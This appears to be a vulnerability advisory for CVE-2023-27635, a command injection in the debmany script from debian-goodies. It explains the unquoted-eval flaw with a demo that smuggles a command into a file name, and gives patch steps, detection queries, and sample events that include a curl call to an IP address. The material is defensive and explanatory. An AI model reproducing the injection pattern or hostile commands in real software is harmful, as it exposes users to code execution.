CVE-2023-27635

7.8 HIGH

📋 TL;DR

CVE-2023-27635 is a command injection vulnerability in debmany, a script shipped in the debian-goodies package, that lets an attacker execute arbitrary shell commands on the machine of any user who opens a crafted .deb file with debmany. The script builds a command line containing a path taken from the untrusted archive and hands it to the shell's eval builtin without quoting it, so shell metacharacters in a member file name are parsed as shell syntax instead of being treated as part of a name. The injected commands run with the privileges of the user who invoked debmany.
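To make the mechanism concrete, here is an added example; it is not debmany's own source and not from the debian-goodies project, only a stripped-down model of the pattern described above. It assumes the viewer command is kept as a string so the user can add flags (as with MANPAGER="less -R"), and that the file path comes straight from the member list of an untrusted .deb. The file names it creates are constructed for the demo.

```shell
#!/bin/sh
# Added example, not debmany's own source: a minimal model of the unquoted
# eval pattern behind CVE-2023-27635, beside a safe alternative.
# Assumptions: the viewer is a user-configurable string (like MANPAGER) and
# the path comes from the untrusted archive. File names are constructed here.

VIEWER="cat"

# Vulnerable: the path is spliced into a command string and re-parsed by
# eval, so ';', '$(...)', '|' and friends inside an archive member name become
# shell syntax and run with the privileges of whoever invoked the tool.
show_unsafe() {
    path=$1
    eval "$VIEWER $path"
}

# Safe: word-split only the trusted viewer string, then pass the untrusted
# path as one separate argument. No shell parser ever sees the file name, so
# metacharacters are just bytes in a name.
show_safe() {
    path=$1
    set -- $VIEWER
    "$@" "$path"
}

# Scratch "package tree": an ordinary man page and a file whose name carries
# an injected command (both constructed for the demo, not from any real .deb).
make_fixture() {
    dir=$(mktemp -d)
    printf 'REAL MANPAGE\n' > "$dir/page.1"
    printf 'harmless\n' > "$dir/page.1; echo INJECTED"
    printf '%s\n' "$dir"
}

# Prints "REAL MANPAGE" and then "INJECTED": the ';' split the eval'd string.
run_unsafe_demo() {
    dir=$(make_fixture)
    show_unsafe "$dir/page.1; echo INJECTED"
    rm -rf "$dir"
}

# Prints "harmless": the oddly named file is simply opened as a file.
run_safe_demo() {
    dir=$(make_fixture)
    show_safe "$dir/page.1; echo INJECTED"
    rm -rf "$dir"
}

echo "== unsafe (eval of interpolated path) =="
run_unsafe_demo
echo "== safe (path passed as an argument) =="
run_safe_demo
```

The fix is not "quote harder inside the eval string" but keeping the untrusted value out of anything that is re-parsed: only the operator-controlled viewer string is split into words, and the archive path travels as a single argv element. The same principle applies to any script that assembles a command line from package metadata or file listings.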

💻 Affected Systems

Products:
  • debian-goodies
Versions: 0.88.1 and earlier
Operating Systems: Debian, Ubuntu, other Debian-based distributions
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects hosts where debmany is installed and used to inspect .deb files. Exploitation requires a user to open a malicious .deb with debmany; the injected commands run as that user.

📦 What is this software?

debian-goodies is a Debian package that bundles small helper utilities for package management on Debian-based systems (checkrestart, dglob, debmany and others). debmany is a shell script that lets a user browse and read the man pages and other documentation contained in a .deb package, installed or not, by extracting the archive to a temporary directory and opening the selected file in a viewer.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full compromise of the account that ran debmany; if the user runs it as root (directly or via sudo), complete control of the affected system.

🟠

Likely Case

Arbitrary code execution as the user who opened an untrusted .deb with debmany (the bug does not escalate privileges by itself), enough for data theft, credential harvesting or a foothold for lateral movement.

🟢

If Mitigated

Limited impact if debmany is only pointed at packages obtained from signed, trusted repositories and users are not in the habit of inspecting .deb files of unknown origin.

🌐 Internet-Facing: LOW - debmany is typically used locally and not exposed directly to internet-facing services.
🏢 Internal Only: MEDIUM - Risk exists when users process .deb files from untrusted internal sources or external media.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires a user to open a crafted .deb file with debmany. The path is shown to the user before the command runs, which gives some warning but does not prevent exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.88.2 or later

Vendor Advisory: https://bugs.debian.org/1031267

Restart Required: No

Instructions:

1. Update the package: sudo apt update && sudo apt install --only-upgrade debian-goodies
2. Verify the installed version: dpkg -l debian-goodies
3. Confirm the version is 0.88.2 or higher

🔧 Temporary Workarounds

Remove debmany script

linux

Make the vulnerable debmany script unusable until the package is updated. Run one of the following, not both (chmod has nothing to act on once the file is removed). Either change is undone the next time the package is upgraded or reinstalled, which is what you want once the fixed version lands.

sudo rm /usr/bin/debmany
sudo chmod 000 /usr/bin/debmany

Use alternative .deb inspection tools

linux

Use dpkg-deb (or other tools that list and inspect the archive without evaluating member names) instead of debmany

dpkg-deb -c package.deb
dpkg-deb -I package.deb

🧯 If You Can't Patch

  • Do not open .deb files of unknown origin with debmany; obtain packages only through apt from signed repositories
  • Before inspecting a .deb obtained out of band, verify the publisher's signature or checksum and list its contents with dpkg-deb -c first; a member name containing shell metacharacters (; | & $( or backticks) is a red flag

🔍 How to Verify

Check if Vulnerable:

Confirm the package is installed and read its version: dpkg-query -W -f='${Status} ${Version}\n' debian-goodies

Check Version:

dpkg-query -W -f='${Version}\n' debian-goodies

Verify Fix Applied:

Compare the installed version against the fixed one using dpkg's own version ordering rather than a grep pattern (a pattern like 0.88.[2-9] misses 0.88.10 or 0.90 and gives a false negative): dpkg --compare-versions "$(dpkg-query -W -f='${Version}' debian-goodies)" ge 0.88.2 && echo fixed || echo vulnerable

📡 Detection & Monitoring

Log Indicators:

  • Child processes of a bash process whose command line names /usr/bin/debmany (debmany is a bash script, so the process name is bash, not debmany) that are shells, interpreters or download tools rather than the pager or viewer debmany normally spawns
  • Shell metacharacters (; | & $( or backticks) in file paths listed from a .deb shortly before such a child process appears

Network Indicators:

  • Unexpected outbound connections after .deb file processing

SIEM Query:

process.parent.cmdline:*debmany* AND process.name:(sh OR bash OR dash OR curl OR wget OR nc OR python3 OR perl)

Field names follow the process.* convention used on this page; adjust them to your schema. Matching on process.name:"debmany" or on "eval" in a command line does not work: debmany is a bash script (the process name is bash and its argv names /usr/bin/debmany), and eval is a shell builtin that never appears as a process of its own.
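The parent-child logic behind that query, as an added detection example that is not from the page or the debian-goodies project. It assumes process-creation events have been exported as tab-separated lines of pid, ppid, comm and cmdline (from auditd, an EDR or similar); the sample events, paths and the IP address are constructed for the demo.

```shell
#!/bin/sh
# Added detection example, not from the page or the debian-goodies project.
# Assumption: process-creation events are available as tab-separated lines
# "pid ppid comm cmdline". debmany is a bash script, so the parent of interest
# is a bash process whose command line names /usr/bin/debmany; anything
# injected through the eval runs as a direct child of that bash.

# Constructed sample events: one debmany run on a hostile .deb (pid 4101) and
# one on a benign .deb (pid 4201). Paths and the IP are made up for the demo.
sample_events() {
    printf '%s\t%s\t%s\t%s\n' \
        4101 3990 bash     '/bin/bash /usr/bin/debmany evil.deb' \
        4102 4101 dpkg-deb 'dpkg-deb -c evil.deb' \
        4103 4101 cat      'cat /tmp/debmany.abc123/usr/share/man/man1/page.1' \
        4104 4101 curl     'curl http://198.51.100.7/x' \
        4105 4101 sh       'sh' \
        4201 3990 bash     '/bin/bash /usr/bin/debmany good.deb' \
        4202 4201 less     'less /tmp/debmany.def456/usr/share/man/man1/ls.1'
}

# Flag children of a debmany bash whose program is a shell, interpreter or
# download tool. Pass 1 maps pid -> cmdline; pass 2 joins each event to its
# parent. Tune the program list to what debmany legitimately spawns on your
# hosts (dpkg-deb, less, man, cat, dialog ...).
detect_debmany_children() {
    awk -F '\t' '
        NR == FNR { cmd[$1] = $4; next }
        {
            parent = cmd[$2]
            if (parent ~ /\/debmany/ && $3 ~ /^(sh|bash|dash|curl|wget|nc|ncat|python3?|perl)$/)
                printf "ALERT pid=%s parent_pid=%s comm=%s cmdline=%s\n", $1, $2, $3, $4
        }' "$1" "$1"
}

# Number of alerts raised on the constructed sample: 2 (curl and sh under 4101).
count_sample_alerts() {
    f=$(mktemp)
    sample_events > "$f"
    detect_debmany_children "$f" | awk 'END { print NR }'
    rm -f "$f"
}

f=$(mktemp)
sample_events > "$f"
detect_debmany_children "$f"
rm -f "$f"
```

The benign run (pid 4201) spawns only a pager and is not flagged, while the curl and sh children of the hostile run are. Joining on the parent's command line rather than its process name is the part that matters; a rule keyed on a process named "debmany" never fires.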

🔗 References
